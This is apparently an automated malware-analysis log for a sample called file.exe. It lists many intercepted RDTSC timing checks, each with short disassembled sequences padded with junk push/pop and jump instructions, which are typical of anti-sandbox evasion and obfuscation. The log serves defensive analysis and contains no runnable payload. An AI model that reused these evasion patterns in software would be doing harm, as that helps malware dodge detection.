Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 3A0712 second address: 3A071E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 3A071E second address: 3A073D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE2E9211D87h 0x00000009 popad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 3A0894 second address: 3A089C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 3B3F6B second address: 3B3F71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 3B3F71 second address: 3B3F77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 3B3F77 second address: 3B3F82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 3B3F82 second address: 3B3F86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 3B3F86 second address: 3B3F8A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 3B3F8A second address: 3B3F99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b pop eax 0x0000000c push edi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 3B3F99 second address: 3B3FB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE2E9211D7Bh 0x00000009 pop edi 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d js 00007FE2E9211D7Ch 0x00000013 jnl 00007FE2E9211D76h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 3B3FB8 second address: 3B3FEE instructions: 0x00000000 rdtsc 0x00000002 je 00007FE2E9231ECCh 0x00000008 jmp 00007FE2E9231EB6h 0x0000000d jmp 00007FE2E9231EB0h 0x00000012 push eax 0x00000013 push edx 0x00000014 jo 00007FE2E9231EA6h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 3B6461 second address: 3B6480 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE2E9211D89h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 3B6480 second address: 3B64A3 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jp 00007FE2E9231EA6h 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c jnc 00007FE2E9231EA6h 0x00000012 jmp 00007FE2E9231EB1h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 3B64A3 second address: 3B64B1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 3B64B1 second address: 3B64B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 3B64B5 second address: 3B64C5 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FE2E9211D76h 0x00000008 jp 00007FE2E9211D76h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 3BD732 second address: 3BD738 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 3BD738 second address: 3BD743 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push edi 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 3BD743 second address: 3BD760 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jnl 00007FE2E9231EA6h 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 jo 00007FE2E9231EA6h 0x00000017 jnl 00007FE2E9231EA6h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 3BD9E4 second address: 3BD9E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 3BD9E8 second address: 3BDA00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jp 00007FE2E9231EB2h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 3BDA00 second address: 3BDA22 instructions: 0x00000000 rdtsc 0x00000002 js 00007FE2E9211D82h 0x00000008 jnl 00007FE2E9211D76h 0x0000000e ja 00007FE2E9211D76h 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FE2E9211D7Ah 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 3BDA22 second address: 3BDA26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 3BDB5B second address: 3BDB7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FE2E9211D83h 0x0000000e je 00007FE2E9211D76h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 3BDB7D second address: 3BDB99 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE2E9231EADh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push edi 0x0000000b pop edi 0x0000000c jo 00007FE2E9231EA6h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 3BDE4F second address: 3BDE5C instructions: 0x00000000 rdtsc 0x00000002 je 00007FE2E9211D76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 3BDE5C second address: 3BDEAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FE2E9231EA6h 0x0000000a popad 0x0000000b jno 00007FE2E9231EA8h 0x00000011 push edx 0x00000012 je 00007FE2E9231EA6h 0x00000018 pop edx 0x00000019 popad 0x0000001a pushad 0x0000001b pushad 0x0000001c jc 00007FE2E9231EA6h 0x00000022 jnc 00007FE2E9231EA6h 0x00000028 popad 0x00000029 pushad 0x0000002a jmp 00007FE2E9231EB8h 0x0000002f pushad 0x00000030 popad 0x00000031 popad 0x00000032 pushad 0x00000033 push esi 0x00000034 pop esi 0x00000035 pushad 0x00000036 popad 0x00000037 push eax 0x00000038 push edx 0x00000039 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 3BE1B2 second address: 3BE1BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 3BE1BD second address: 3BE1C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 3BE1C3 second address: 3BE1CC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 3BE1CC second address: 3BE1D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 3BE1D2 second address: 3BE1DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 3BE1DC second address: 3BE1E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 3BEBEB second address: 3BEBF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 3BEBF4 second address: 3BEC2B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FE2E9231EB6h 0x0000000b jmp 00007FE2E9231EB0h 0x00000010 popad 0x00000011 jnp 00007FE2E9231EC5h 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 3BEC2B second address: 3BEC2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 3C312D second address: 3C3131 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 3C3131 second address: 3C314F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FE2E9211D85h 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 3C314F second address: 3C317E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 pushad 0x00000007 jo 00007FE2E9231EA8h 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007FE2E9231EB6h 0x00000014 push eax 0x00000015 push edx 0x00000016 jbe 00007FE2E9231EA6h 0x0000001c pushad 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 3D4447 second address: 3D444B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 3D4278 second address: 3D427E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 3D427E second address: 3D429E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE2E9211D7Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a pushad 0x0000000b popad 0x0000000c pop ecx 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 pop eax 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 3D429E second address: 3D42A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 3D42A2 second address: 3D42A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 3E0A0D second address: 3E0A1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FE2E9231EA6h 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 3E0A1C second address: 3E0A20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 3FA461 second address: 3FA46C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 push esi 0x0000000a pop esi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 3FA46C second address: 3FA472 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 3FA472 second address: 3FA47D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push edx 0x00000008 pop edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 3F9203 second address: 3F9229 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FE2E9211D76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007FE2E9211D83h 0x00000010 jp 00007FE2E9211D76h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 3F9229 second address: 3F925E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE2E9231EB6h 0x00000009 popad 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FE2E9231EB3h 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 3F925E second address: 3F9282 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jno 00007FE2E9211D76h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007FE2E9211D88h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 3F96E7 second address: 3F96EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 3F96EB second address: 3F96FD instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jg 00007FE2E9211D76h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 3F96FD second address: 3F9701 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 3F9701 second address: 3F970E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 3F970E second address: 3F9712 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 3F9867 second address: 3F986B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 3F986B second address: 3F9894 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007FE2E9231EAAh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push edx 0x00000011 pop edx 0x00000012 jmp 00007FE2E9231EB2h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 3F9894 second address: 3F989E instructions: 0x00000000 rdtsc 0x00000002 jns 00007FE2E9211D76h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 3F989E second address: 3F98A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 3F9CE5 second address: 3F9CEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 3FA144 second address: 3FA149 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 3FE287 second address: 3FE28C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 3FE794 second address: 3FE7D6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE2E9231EB7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a mov dword ptr [esp], eax 0x0000000d movzx edx, ax 0x00000010 mov edx, dword ptr [ebp+122D385Eh] 0x00000016 push dword ptr [ebp+12455FB1h] 0x0000001c mov edx, dword ptr [ebp+1245A952h] 0x00000022 push CEAF475Ch 0x00000027 push ebx 0x00000028 push eax 0x00000029 push edx 0x0000002a jnc 00007FE2E9231EA6h 0x00000030 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AB0128 second address: 4AB0140 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE2E9211D84h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AB0140 second address: 4AB0144 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AB0144 second address: 4AB019A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 pushad 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007FE2E9211D88h 0x00000011 or ah, FFFFFF88h 0x00000014 jmp 00007FE2E9211D7Bh 0x00000019 popfd 0x0000001a pushad 0x0000001b popad 0x0000001c popad 0x0000001d mov dx, ax 0x00000020 popad 0x00000021 mov dword ptr [esp], ebp 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007FE2E9211D87h 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A90DAD second address: 4A90DB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A90DB4 second address: 4A90DD5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE2E9211D86h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A90DD5 second address: 4A90DD9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A90DD9 second address: 4A90DDF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A90DDF second address: 4A90DE5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A90DE5 second address: 4A90E5C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE2E9211D81h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007FE2E9211D83h 0x00000015 or eax, 53906E5Eh 0x0000001b jmp 00007FE2E9211D89h 0x00000020 popfd 0x00000021 pushfd 0x00000022 jmp 00007FE2E9211D80h 0x00000027 jmp 00007FE2E9211D85h 0x0000002c popfd 0x0000002d popad 0x0000002e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A90E5C second address: 4A90E62 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A90E62 second address: 4A90E66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A90E66 second address: 4A90EB1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE2E9231EB3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007FE2E9231EB4h 0x00000014 jmp 00007FE2E9231EB5h 0x00000019 popfd 0x0000001a push eax 0x0000001b push edx 0x0000001c mov bl, al 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A90EB1 second address: 4A90EF5 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FE2E9211D83h 0x00000008 or eax, 06E8C08Eh 0x0000000e jmp 00007FE2E9211D89h 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 popad 0x00000017 pop ebp 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b mov dh, 9Dh 0x0000001d mov cx, 28ABh 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AE006D second address: 4AE007D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edi, ax 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AE007D second address: 4AE0083 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AE0083 second address: 4AE0089 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AE0089 second address: 4AE008D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4AE008D second address: 4AE0091 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A90674 second address: 4A906AA instructions: 0x00000000 rdtsc 0x00000002 movzx esi, bx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 push ebx 0x00000009 pushad 0x0000000a push edi 0x0000000b jmp 00007FE2E9211D88h 0x00000010 pop ecx 0x00000011 popad 0x00000012 mov dword ptr [esp], ebp 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007FE2E9211D7Ch 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A906AA second address: 4A906B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A906B0 second address: 4A906B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A906B4 second address: 4A906B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A902D5 second address: 4A902D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A902D9 second address: 4A902ED instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE2E9231EB0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A902ED second address: 4A90314 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE2E9211D7Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FE2E9211D85h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A90314 second address: 4A90319 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4A90319 second address: 4A9033C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FE2E9211D7Dh 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FE2E9211D7Ch 0x00000014 rdtsc
